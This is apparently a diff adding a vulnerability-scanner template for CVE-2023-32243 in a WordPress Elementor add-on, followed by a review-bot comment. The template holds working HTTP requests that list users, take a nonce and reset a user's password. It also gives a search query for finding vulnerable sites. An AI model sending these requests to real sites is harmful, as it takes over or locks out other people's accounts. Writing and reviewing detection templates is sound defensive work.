diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml
new file mode 100644
index 0000000000..0ae9ce4ac8
--- /dev/null
+++ b/http/cves/2023/CVE-2023-32243.yaml
@@ -0,0 +1,77 @@
+id: CVE-2023-32243
+
+info:
+ name: WordPress Elementor Lite 5.7.1 Arbitrary Password Reset
+ author: DhiyaneshDK
+ severity: critical
+ description: |
+ Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-32243
+ - https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites?_s_id=cve
+ - https://github.com/RandomRobbieBF/CVE-2023-32243/blob/main/exploit.py
+ - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-32243
+ cwe-id: CWE-287
+ metadata:
+ max-request: 3
+ google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite
+ verified: "true"
+ tags: wpscan,cve2023,wordpress,wp-plugin,auth-bypass
+
+variables:
+ password1: "{{randstr}}"
+ password2: "{{randstr}}"
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /wp-json/wp/v2/users/ HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/2
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Accept-Encoding: gzip
+ User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
+
+ action=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password1}}&eael-pass2={{password2}}&rp_login={{wordpress-username}}
+
+ host-redirects: true
+ max-redirects: 2
+
+ extractors:
+ - type: regex
+ name: nonce
+ part: body_1
+ group: 1
+ regex:
+ - 'nonce":"([0-9a-z]+)'
+ internal: true
+
+ - type: json
+ part: body_2
+ name: wordpress-username
+ group: 1
+ json:
+ - '.[] | .slug'
+ - '.[].name'
+ internal: true
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_3
+ words:
+ - '"success":true'
+ - '"data":'
+ condition: and
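Review bot: The third raw request in the hunk changes the password of whichever account the `wordpress-username` extractor pulls from `/wp-json/wp/v2/users/` to a random value the template does not report, so a positive match leaves a real account locked out, and nothing in `info` says so. Add `intrusive` to the `tags` line and state the side effect in `description`, e.g. append `This check resets the password of an existing user to a random value; the affected account must have its password restored afterwards.`, so the template can be excluded from routine scans. The request line `POST /wp-admin/admin-ajax.php HTTP/2` also differs from the `HTTP/1.1` used by the two preceding raw requests; if the HTTP/2 form is not deliberate, `HTTP/1.1` keeps the three consistent. The `name` field reads `WordPress Elementor Lite 5.7.1 Arbitrary Password Reset` while `description` names the affected plugin as Essential Addons for Elementor 5.4.0 through 5.7.1; a name such as `WordPress Essential Addons for Elementor 5.4.0 - 5.7.1 - Arbitrary Password Reset` would match the description.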